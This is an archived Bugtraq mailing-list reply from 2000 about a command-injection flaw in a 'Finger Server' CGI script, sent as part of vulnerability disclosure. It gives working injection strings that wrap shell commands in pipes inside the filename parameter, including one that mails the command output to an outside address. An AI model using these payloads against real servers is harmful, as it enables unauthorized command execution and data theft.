<a href="http://g.adspeed.net/ad.php?do=clk&zid=14678&wd=728&ht=90&pair=as" target="_top"><img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&zid=14678&wd=728&ht=90&pair=as" alt="i" width="728" height="90"/></a>

Nmap Security Scanner

Docs
Security Lists

Full Disclosure

More
Security Tools

Packet crafters

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

edgeos

Bugtraq: Re: "The Finger Server"

Re: "The Finger Server"

From: Iain Wade <iwade_at_OPTUSNET.COM.AU>
Date: Sat, 5 Feb 2000 21:35:15 +1100

> Hi,
>
> I am unable to reproduce this problem. I tried doing:
>finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.use>
rname.plan.|id|
>
> And it didn't work.
>

I should have pointed out that the output will not get
to you (the web client) obviously if you use |<shell
command>| .. it does however get executed ...

I mailed the output to a @yahoo.com address ..

So an example to test it could be
|id|mail+email_at_address|

Surrounding it in pipes was the only way I could get it
to execute, otherwise it would return open errors ..

---
Iain Wade - Optus Internet
Email: iwade_at_optusnet.com.au

Received on Feb 07 2000

This message: [ Message body ]
Next message: Jesús López de Aguileta: "More SQL hacking with IIS 4 through Access Driver"
Previous message: Thomas Reinke: "Re: Evil Cookies."
Maybe in reply to: Iain Wade: ""The Finger Server""
Next in thread: Ussr Labs: "Windows Api SHGetPathFromIDList Buffer Overflow"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]

edgeos